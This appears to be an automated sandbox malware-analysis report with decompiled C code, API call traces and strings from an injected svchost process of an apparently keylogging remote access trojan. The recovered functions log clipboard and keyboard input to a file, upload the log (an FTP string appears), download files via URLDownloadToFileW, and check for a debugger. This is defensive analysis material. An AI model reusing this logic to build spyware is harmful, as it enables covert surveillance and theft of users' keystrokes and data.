				void* _t38;
				void* _t39;

				while(1) {
					_t30 = 0;
					do {
						L2:
						Sleep(0x3e8);
						_t30 = _t30 + 1;
						_t8 =  *0xc8db94; // 0x0
					} while (_t30 < (_t8 + 1 + (_t8 + 1) * 4) * 0x3c);
					L3:
					if( *0xc8dee8 == 0) {
						do {
							_t30 = 0;
							goto L2;
						} while ( *0xc8dee8 == 0);
					}
					E00C8291C();
					E00C86890( &_v516);
					_t35 = E00C82E48( &_v516) - 1;
					if(_t35 < 0) {
						L13:
						_t19 =  *0xc8dec8; // 0x0
						if(E00C873E0(0xc8da4c, E00C833A8(_t19, 0xc8773c, _t46), 0xc8da9e, 0xc8db42, 0xc8daf0,  &_v516) != 0 &&  *0xc8db98 == 1 &&  *0xc8da4b == 1) {
							_t23 =  *0xc8dee8; // 0x0
							SetFilePointer(_t23, 0, 0, 0);
							_t25 =  *0xc8dee8; // 0x0
							SetEndOfFile(_t25);
							 *0xc8b0c8 = 0;
							 *0xc8b0cc = 0;
							E00C853EC(0, _t30, _t39);
						}
						continue;
					} else {
						_t38 = _t35 + 1;
						_t29 =  &_v516;
						do {
							_t32 =  *_t29;
							if(_t32 != 0x3a) {
								__eflags = _t32 - 0x2f;
								if(__eflags != 0) {
									__eflags = _t32 - 0x20;
									if(__eflags == 0) {
										 *_t29 = 0x2d;
									}
								} else {
									 *_t29 = 0x2e;
								}
							} else {
								 *_t29 = 0x2e;
							}
							_t29 = _t29 + 2;
							_t38 = _t38 - 1;
							_t46 = _t38;
						} while (_t38 != 0);
						goto L13;
					}
				}
			}

APIs

Sleep.KERNEL32(000003E8), ref: 00C87625

Part of subcall function 00C86890: GetLocalTime.KERNEL32 ref: 00C86897
Part of subcall function 00C86890: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,?,000000FF), ref: 00C868B0
Part of subcall function 00C86890: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C868E0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C873E0: GetFileSize.KERNEL32(00000000,00000000), ref: 00C87417
Part of subcall function 00C873E0: SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C874D7
Part of subcall function 00C873E0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C874EC
Part of subcall function 00C873E0: VirtualAlloc.KERNEL32(00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C87506
Part of subcall function 00C873E0: ReadFile.KERNEL32(00000000,?,-00C8B0C8,?,00000000), ref: 00C87525
Part of subcall function 00C873E0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000), ref: 00C87536
Part of subcall function 00C873E0: SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C8754B
Part of subcall function 00C873E0: SetFileAttributesW.KERNEL32(?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000), ref: 00C87556
Part of subcall function 00C873E0: DeleteFileW.KERNEL32(?,?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000), ref: 00C8755C
Part of subcall function 00C873E0: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00C87571
Part of subcall function 00C873E0: WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000), ref: 00C87592
Part of subcall function 00C873E0: VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 00C875BB
Part of subcall function 00C873E0: CloseHandle.KERNEL32(00000000), ref: 00C875C1
Part of subcall function 00C873E0: DeleteFileW.KERNEL32(?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,00000000), ref: 00C87602

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8DB42,00C8DAF0,?,000003E8), ref: 00C87705
SetEndOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00C8DB42,00C8DAF0,?,000003E8), ref: 00C87710

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Strings

FTP, xrefs: 00C876B7

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C82F90, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registry

C-Code - Quality: 100%

			E00C82F90(void* __eax, short* __edx, void* __eflags, int _a4, char* _a8) {
				void* _v8;
				void* _t17;
				short* _t18;
				char* _t22;

				_t22 = _a8;
				_t17 = 0;
				RegCreateKeyW(__eax, __edx,  &_v8);
				if(RegSetValueExW(_v8, _t18, 0, _a4, _t22, E00C82E48(_t22) + _t9) == 0) {
					_t17 = 1;
				}
				RegCloseKey(_v8);
				return _t17;
			}

0x00c82f99
0x00c82f9c
0x00c82fa4
0x00c82fc6
0x00c82fc8
0x00c82fc8
0x00c82fce
0x00c82fda

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Strings

ServerStarted, xrefs: 00C82F93, 00C82FBA

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C89790, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
time

C-Code - Quality: 100%

			E00C89790(short* __eax) {
				struct _SYSTEMTIME _v20;
				short* _t17;
				struct _SYSTEMTIME* _t18;

				_t17 = __eax;
				GetLocalTime(_t18);
				GetDateFormatW(0x800, 1,  &_v20, 0, _t17, 0xff);
				_t17[E00C82E48(_t17)] = 0x20;
				return GetTimeFormatW(0x800, 8,  &_v20, 0,  &(_t17[E00C82E48(_t17)]), 0xff);
			}

0x00c89794
0x00c89797
0x00c897b0
0x00c897bc
0x00c897e9

APIs

GetLocalTime.KERNEL32 ref: 00C89797
GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,5/3/2018 10:11:44 AM,000000FF), ref: 00C897B0
GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C897E0

Strings

5/3/2018 10:11:44 AM, xrefs: 00C897A1

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8861C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25
library

C-Code - Quality: 58%

			E00C8861C() {
				void* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;

				_t5 = 0;
				_t6 = LoadLibraryA("kernel32.dll");
				if(_t6 != 0) {
					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
					_t7 = _t8;
					if(_t8 != 0) {
						_t5 =  *_t7();
					}
				}
				return _t5;
			}

0x00c88620
0x00c8862c
0x00c88630
0x00c8863d
0x00c8863f
0x00c88643
0x00c88647
0x00c88647
0x00c88643
0x00c8864f

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88627
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent,kernel32.dll,?,00C8E07C,00000000,00000000,00C886B8,?,00C88A28), ref: 00C88638

Strings

kernel32.dll, xrefs: 00C88622
IsDebuggerPresent, xrefs: 00C88632

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C837C0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
network

C-Code - Quality: 37%

			E00C837C0(void* __eax, WCHAR* __edx) {
				signed int _t4;
				void* _t6;
				WCHAR* _t8;

				_t8 = __edx;
				_t6 = __eax;
				_push(__eax);
				L00C837B8();
				_t4 = DeleteFileW(__edx);
				_push(0);
				_push(0);
				_push(_t8);
				_push(_t6);
				_push(0);
				L00C837B0();
				return _t4 & 0xffffff00 | _t4 == 0x00000000;
			}

0x00c837c2
0x00c837c4
0x00c837c6
0x00c837c7
0x00c837cd
0x00c837d2
0x00c837d4
0x00c837d6
0x00c837d7
0x00c837d8
0x00c837da
0x00c837e6

APIs

DeleteUrlCacheEntryW.WININET(local), ref: 00C837C7
DeleteFileW.KERNEL32(00000000,local,00000000,00C87C00,00000000,00C87D2A,?,00000000,00000000), ref: 00C837CD
URLDownloadToFileW.URLMON(00000000,local,00000000,00000000,00000000), ref: 00C837DA

Strings

local, xrefs: 00C837C1, 00C837C6, 00C837D7

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C82E70, Relevance: 6.1, APIs: 4, Instructions: 96
registry

C-Code - Quality: 74%

			E00C82E70(void* __eax, void* __ebx, char __ecx, char __edx, void* __esi, intOrPtr* _a4, char _a8) {
				char _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				intOrPtr _t72;
				signed int _t77;
				void* _t79;
				short* _t80;
				void* _t83;
				long _t86;

				_v12 = __ecx;
				_v8 = __edx;
				_t79 = __eax;
				_t63 = _a4;
				E00C81FB0( &_v8);
				E00C81FB0( &_v12);
				E00C81FB0( &_a8);
				_push(_t83);
				_push(0xc82f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffec;
				E00C81BB4(_a4, _a8);
				if(RegOpenKeyExW(_t79, E00C81CF4(_v8), 0, 1,  &_v16) == 0) {
					_t80 = E00C81CF4(_v12);
					_t86 = RegQueryValueExW(_v16, _t80, 0,  &_v20, 0,  &_v24);
					if(_t86 == 0) {
						_t77 = _v24 >> 1;
						if(_t86 < 0) {
							asm("adc edx, 0x0");
						}
						E00C81F6C(_t63, _t77);
						RegQueryValueExW(_v16, _t80, 0,  &_v20, E00C81CF4( *_t63),  &_v24);
					}
					RegCloseKey(_v16);
				}
				if(E00C81F1C(0xc82f8c,  *_t63) > 0) {
					E00C81E40( *_t63, E00C81F1C(0xc82f8c,  *_t63) - 1, 1, E00C81F1C(0xc82f8c,  *_t63) - 1, _t63);
				}
				_pop(_t72);
				 *[fs:eax] = _t72;
				_push(E00C82F7E);
				E00C81B90( &_v12, 2);
				return E00C81B78( &_a8);
			}

APIs

Part of subcall function 00C81FB0: SysAllocStringLen.OLEAUT32(?,?), ref: 00C81FBE

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EC5
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EE9
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 00C82F1A
RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C), ref: 00C82F23

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8313C, Relevance: 6.1, APIs: 4, Instructions: 76

C-Code - Quality: 54%

			E00C8313C(int __eax, void* __ebx, void* __esi) {
				void* _v8;
				struct _ITEMIDLIST* _v12;
				char _v16;
				intOrPtr* _t25;
				struct _ITEMIDLIST* _t29;
				void* _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t44;
				void* _t46;
				void* _t47;
				intOrPtr _t48;

				_t46 = _t47;
				_t48 = _t47 + 0xfffffff4;
				_v16 = 0;
				_t44 = __eax;
				_push(_t46);
				_push(0xc83205);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48;
				E00C8238C( &_v16);
				_push(E00C8238C( &_v16));
				L00C83124();
				_t35 = 0;
				if(_v16 != 0) {
					_push(_t46);
					_push(0xc831e8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t48;
					if(E00C83118(SHGetSpecialFolderLocation(0, _t44,  &_v12)) != 0) {
						_t35 = VirtualAlloc(0, 0x208, 0x1000, 4);
						_push(_t35);
						_t29 = _v12;
						_push(_t29);
						L00C83134();
						asm("sbb eax, eax");
						if(_t29 + 1 == 0) {
							_t35 = 0;
						}
					}
					_v8 = _t35;
					_pop(_t41);
					 *[fs:eax] = _t41;
					_t25 = _v16;
					return  *((intOrPtr*)( *_t25 + 0x14))(_t25, _v12, E00C831EF);
				} else {
					_v8 = 0;
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E00C8320C);
					return E00C8238C( &_v16);
				}
			}

0x00c8313d
0x00c8313f
0x00c83146
0x00c83149
0x00c8314d
0x00c8314e
0x00c83153
0x00c83156
0x00c8315c
0x00c83169
0x00c8316a
0x00c8316f
0x00c83175
0x00c8317e
0x00c8317f
0x00c83184
0x00c83187
0x00c8319d
0x00c831b2
0x00c831b4
0x00c831b5
0x00c831b8
0x00c831b9
0x00c831c1
0x00c831c6
0x00c831c8
0x00c831c8
0x00c831c6
0x00c831ca
0x00c831cf
0x00c831d2
0x00c831de
0x00c831e7
0x00c83177
0x00c83177
0x00c831f1
0x00c831f4
0x00c831f7
0x00c83204
0x00c83204

APIs

SHGetMalloc.SHELL32(00000000), ref: 00C8316A
SHGetSpecialFolderLocation.SHELL32(00000000,0000001A,?), ref: 00C83191
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C831E8,?,00000000,00C83205,?,?), ref: 00C831AD
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00C831B9

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C86946, Relevance: 6.1, APIs: 4, Instructions: 55
windowfile

C-Code - Quality: 53%

			E00C86946(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _v32;
				int _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v830;
				char _v1352;
				void* _t149;
				void* _t151;
				CHAR* _t153;
				intOrPtr _t156;
				struct HHOOK__* _t159;
				void* _t165;
				void* _t173;
				void* _t174;
				void* _t180;
				void* _t181;
				void* _t190;
				void* _t191;
				void* _t194;
				void* _t200;
				void* _t209;
				void* _t210;
				void* _t219;
				void* _t220;
				void* _t226;
				void* _t235;
				void* _t236;
				int _t241;
				void* _t242;
				intOrPtr _t257;
				int _t260;
				void* _t270;
				void* _t271;
				int _t286;
				int _t287;
				struct HWND__* _t288;
				void* _t297;
				void* _t298;
				void* _t304;
				void* _t313;
				void* _t314;
				void* _t320;
				void* _t321;
				int _t328;
				void* _t330;
				void* _t331;
				void* _t340;
				void* _t341;
				void* _t348;
				void* _t349;
				void* _t358;
				void* _t359;
				void* _t368;
				void* _t369;
				void* _t375;
				void* _t376;
				void* _t385;
				void* _t386;
				int _t401;
				int _t402;
				struct HWND__* _t403;
				int _t415;
				int _t416;
				struct HWND__* _t417;
				int _t432;
				int _t433;
				struct HWND__* _t434;
				int _t449;
				int _t450;
				struct HWND__* _t451;
				void* _t460;
				void* _t461;
				int _t476;
				int _t477;
				struct HWND__* _t478;
				struct HHOOK__* _t485;
				int _t488;
				void* _t492;
				signed int _t493;
				long _t494;
				long _t496;
				long _t497;
				long _t498;
				long _t499;
				long _t500;
				void* _t504;
				void* _t507;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				void* _t517;
				void* _t519;
				void* _t520;
				void* _t521;
				void* _t524;
				void* _t525;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t531;
				void* _t537;
				intOrPtr _t539;
				long _t594;
				void* _t597;
				void* _t599;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v24 = 0;
				_v40 = 0;
				_t594 = _a16;
				_t592 = _a12;
				_t488 = _a8;
				_push(_t597);
				_push(0xc8727a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t597 + 0xfffffabc;
				_v8 = DefWindowProcA(_a4, _t488, _a12, _t594);
				_t599 = _t488 -  *0xc8ded4; // 0xc1f3
				if(_t599 != 0) {
					__eflags = _t488 -  *0xc8decc; // 0xc1f1
					if(__eflags != 0) {
						__eflags = _t488 - 0x308;
						if(_t488 != 0x308) {
							__eflags = _t488 -  *0xc8ded0; // 0xc1f2
							if(__eflags != 0) {
								__eflags = _t488 -  *0xc8ded8; // 0xc1f4
								if(__eflags != 0) {
									__eflags = _t488 -  *0xc8dedc; // 0xc1f5
									if(__eflags == 0) {
										__eflags =  *0xc8dee8;
										if( *0xc8dee8 != 0) {
											_t149 =  *0xc8dee8; // 0x0
											SetFilePointer(_t149, 0, 0, 0);
											_t151 =  *0xc8dee8; // 0x0
											SetEndOfFile(_t151);
											 *0xc8b0c8 = 0;
											 *0xc8b0cc = 0;
											__eflags =  *0xc8da4b - 1;
											if( *0xc8da4b == 1) {
												_t153 =  *0xc8b0c8; // 0x0
												E00C853EC(_t153, _t488, _t594);
											}
										}
									}
								} else {
									__eflags =  *0xc8b0c4;
									if( *0xc8b0c4 == 0) {
										_v8 = 0;
									} else {
										_t156 =  *0xc8ded8; // 0xc1f4
										_v8 = _t156 + 1;
									}
								}
							} else {
								__eflags =  *0xc8b0c4;
								if( *0xc8b0c4 != 0) {
									_t159 =  *0xc8b0c4; // 0x0
									UnhookWindowsHookEx(_t159);
								}
								 *0xc8b0c4 = 0;
							}
							goto L58;
						}
						__eflags =  *0xc8b0c4;
						if( *0xc8b0c4 == 0) {
							goto L58;
						}
						__eflags =  *0xc8b0c0 - 1;
						if( *0xc8b0c0 != 1) {
							_v16 = 0xc872d4;
							E00C8291C();
							_t165 = E00C8389C(0,  &_v36,  &_v16);
							__eflags = _t165 - 1;
							if(_t165 != 1) {
								goto L58;
							}
							__eflags = _v32;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									goto L58;
								}
								L43:
								__eflags =  *0xc8dff4;
								if( *0xc8dff4 == 0) {
									E00C81BD8( &_v40, 0xc872cc);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t232);
									_t235 = E00C81CF4(_v40);
									_t236 =  *0xc8dee8; // 0x0
									_pop(_t513);
									E00C85084(_t236, _t513, _t235);
									_push( &_v12);
									_push(0);
									_t241 = E00C81D04(_v40) + _t240;
									__eflags = _t241;
									_t242 =  *0xc8dee8; // 0x0
									_t514 = _t241;
									E00C85084(_t242, _t514, _t235);
								}
								E00C81BD8( &_v40, L"[CLIPBOARD] ---- ");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t170);
								_t173 = E00C81CF4(_v40);
								_t174 =  *0xc8dee8; // 0x0
								_pop(_t504);
								E00C85084(_t174, _t504, _t173);
								E00C86890( &_v1352);
								_t180 = E00C82E48( &_v1352);
								_t181 =  *0xc8dee8; // 0x0
								E00C85084(_t181, _t180 + _t180,  &_v1352, 0,  &_v12);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t187);
								_t190 = E00C81CF4(_v40);
								_t191 =  *0xc8dee8; // 0x0
								_pop(_t507);
								E00C85084(_t191, _t507, _t190);
								_t194 =  *0xc8dee8; // 0x0
								E00C85084(_t194, _v36, _v16, 0,  &_v12);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t198);
								_t200 =  *0xc8dee8; // 0x0
								_pop(_t509);
								E00C85084(_t200, _t509, _t190);
								E00C81BD8( &_v40, L"[CLIPBOARD END]");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t206);
								_t209 = E00C81CF4(_v40);
								_t210 =  *0xc8dee8; // 0x0
								_pop(_t510);
								E00C85084(_t210, _t510, _t209);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t216);
								_t219 = E00C81CF4(_v40);
								_t220 =  *0xc8dee8; // 0x0
								_pop(_t511);
								E00C85084(_t220, _t511, _t219);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t224);
								_t226 =  *0xc8dee8; // 0x0
								_pop(_t512);
								E00C85084(_t226, _t512, _t219);
								 *0xc8dff4 = 0;
								goto L58;
							}
							__eflags = _v36;
							if(_v36 <= 0) {
								goto L58;
							}
							goto L43;
						}
						 *0xc8b0c0 = 0;
						goto L58;
					} else {
						E00C8291C();
						E00C81B78( &_v20);
						E00C81B78( &_v24);
						_t492 = _t594;
						E00C82914( &_v308, _t492);
						VirtualFree(_t492, 0, 0x8000);
						E00C868EC( &_v20);
						_t257 =  *0xc8dff8; // 0x0
						E00C81DBC(_t257, _v20);
						_t493 = _t492 & 0xffffff00 | __eflags != 0x00000000;
						__eflags = _t493 - 1;
						if(_t493 == 1) {
							E00C81BB4(0xc8dff8, _v20);
						}
						_t260 = E00C851C4(_v20, _t493, _t592, _t594);
						__eflags = _t260;
						if(_t260 == 0) {
							goto L58;
						}
						E00C85568(_t493,  &_v300, _v304, _t592, _t594,  &_v24, _v44);
						__eflags =  *0xc8dee8 - 0xffffffff;
						if( *0xc8dee8 == 0xffffffff) {
							goto L58;
						}
						__eflags = _t493 - 1;
						if(_t493 != 1) {
							L28:
							__eflags =  *0xc8dff5 - 1;
							if( *0xc8dff5 == 1) {
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t294);
								_t297 = E00C81CF4(_v40);
								_t298 =  *0xc8dee8; // 0x0
								_pop(_t519);
								E00C85084(_t298, _t519, _t297);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t302);
								_t304 =  *0xc8dee8; // 0x0
								_pop(_t520);
								E00C85084(_t304, _t520, _t297);
								E00C81BD8( &_v40, L" --- ");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t310);
								_t313 = E00C81CF4(_v40);
								_t314 =  *0xc8dee8; // 0x0
								_pop(_t521);
								E00C85084(_t314, _t521, _t313);
								E00C86890( &_v830);
								_t320 = E00C82E48( &_v830);
								_t321 =  *0xc8dee8; // 0x0
								E00C85084(_t321, _t320 + _t320,  &_v830, 0,  &_v12);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_t328 = E00C81D04(_v40) + _t327;
								__eflags = _t328;
								_t330 = E00C81CF4(_v40);
								_t331 =  *0xc8dee8; // 0x0
								_t524 = _t328;
								E00C85084(_t331, _t524, _t330);
							}
							_push( &_v12);
							_push(0);
							_push(E00C81D04(_v24) + _t267);
							_t270 = E00C81CF4(_v24);
							_t271 =  *0xc8dee8; // 0x0
							_pop(_t517);
							E00C85084(_t271, _t517, _t270);
							__eflags =  *0xc8b0b8;
							if( *0xc8b0b8 != 0) {
								__eflags =  *0xc8b0bc - 1;
								if( *0xc8b0bc == 1) {
									_t494 = VirtualAlloc(0, E00C81D04(_v24) + _t274, 0x1000, 0x40);
									_push(E00C81D04(_v24) + _t278);
									E00C82914(_t494, E00C81CF4(_v24));
									_t286 = E00C81D04(_v24) + _t285;
									__eflags = _t286;
									_t287 =  *0xc8dee0; // 0xc1f6
									_t288 =  *0xc8b0b8; // 0x0
									PostMessageA(_t288, _t287, _t286, _t494);
								}
							}
							 *0xc8dff5 = 0;
							 *0xc8dff4 = 0;
							goto L58;
						}
						__eflags =  *0xc8dff4;
						if( *0xc8dff4 == 0) {
							E00C81BD8( &_v40, L"\r\n\r\n");
							_push( &_v12);
							_push(0);
							_push(E00C81D04(_v40) + _t457);
							_t460 = E00C81CF4(_v40);
							_t461 =  *0xc8dee8; // 0x0
							_pop(_t537);
							E00C85084(_t461, _t537, _t460);
							__eflags =  *0xc8b0b8;
							if( *0xc8b0b8 != 0) {
								__eflags =  *0xc8b0bc - 1;
								if( *0xc8b0bc == 1) {
									_t500 = VirtualAlloc(0, E00C81D04(_v40) + _t464, 0x1000, 0x40);
									_push(E00C81D04(_v40) + _t468);
									E00C82914(_t500, E00C81CF4(_v40));
									_t476 = E00C81D04(_v40) + _t475;
									__eflags = _t476;
									_t477 =  *0xc8dee0; // 0xc1f6
									_t478 =  *0xc8b0b8; // 0x0
									PostMessageA(_t478, _t477, _t476, _t500);
								}
							}
						}
						E00C81BD8( &_v40, 0xc872a4);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t337);
						_t340 = E00C81CF4(_v40);
						_t341 =  *0xc8dee8; // 0x0
						_pop(_t525);
						E00C85084(_t341, _t525, _t340);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v20) + _t345);
						_t348 = E00C81CF4(_v20);
						_t349 =  *0xc8dee8; // 0x0
						_pop(_t526);
						E00C85084(_t349, _t526, _t348);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t499 = VirtualAlloc(0, E00C81D04(_v20) + _t437, 0x1000, 0x40);
								_push(E00C81D04(_v20) + _t441);
								E00C82914(_t499, E00C81CF4(_v20));
								_t449 = E00C81D04(_v20) + _t448;
								__eflags = _t449;
								_t450 =  *0xc8dee0; // 0xc1f6
								_t451 =  *0xc8b0b8; // 0x0
								PostMessageA(_t451, _t450, _t449, _t499);
							}
						}
						E00C81BD8( &_v40, 0xc872b0);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t355);
						_t358 = E00C81CF4(_v40);
						_t359 =  *0xc8dee8; // 0x0
						_pop(_t527);
						E00C85084(_t359, _t527, _t358);
						E00C81BD8( &_v40, L" --- ");
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t365);
						_t368 = E00C81CF4(_v40);
						_t369 =  *0xc8dee8; // 0x0
						_pop(_t528);
						E00C85084(_t369, _t528, _t368);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t498 = VirtualAlloc(0, E00C81D04(_v40) + _t420, 0x1000, 0x40);
								_push(E00C81D04(_v40) + _t424);
								E00C82914(_t498, E00C81CF4(_v40));
								_t432 = E00C81D04(_v40) + _t431;
								__eflags = _t432;
								_t433 =  *0xc8dee0; // 0xc1f6
								_t434 =  *0xc8b0b8; // 0x0
								PostMessageA(_t434, _t433, _t432, _t498);
							}
						}
						E00C86890( &_v830);
						_t375 = E00C82E48( &_v830);
						_t376 =  *0xc8dee8; // 0x0
						E00C85084(_t376, _t375 + _t375,  &_v830, 0,  &_v12);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t497 = VirtualAlloc(0, E00C82E48( &_v830) + _t406, 0x1000, 0x40);
								E00C82E48( &_v830);
								E00C82914(_t497,  &_v830);
								_t415 = E00C82E48( &_v830) + _t414;
								__eflags = _t415;
								_t416 =  *0xc8dee0; // 0xc1f6
								_t417 =  *0xc8b0b8; // 0x0
								PostMessageA(_t417, _t416, _t415, _t497);
							}
						}
						E00C81BD8( &_v40, 0xc872cc);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t382);
						_t385 = E00C81CF4(_v40);
						_t386 =  *0xc8dee8; // 0x0
						_pop(_t531);
						E00C85084(_t386, _t531, _t385);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
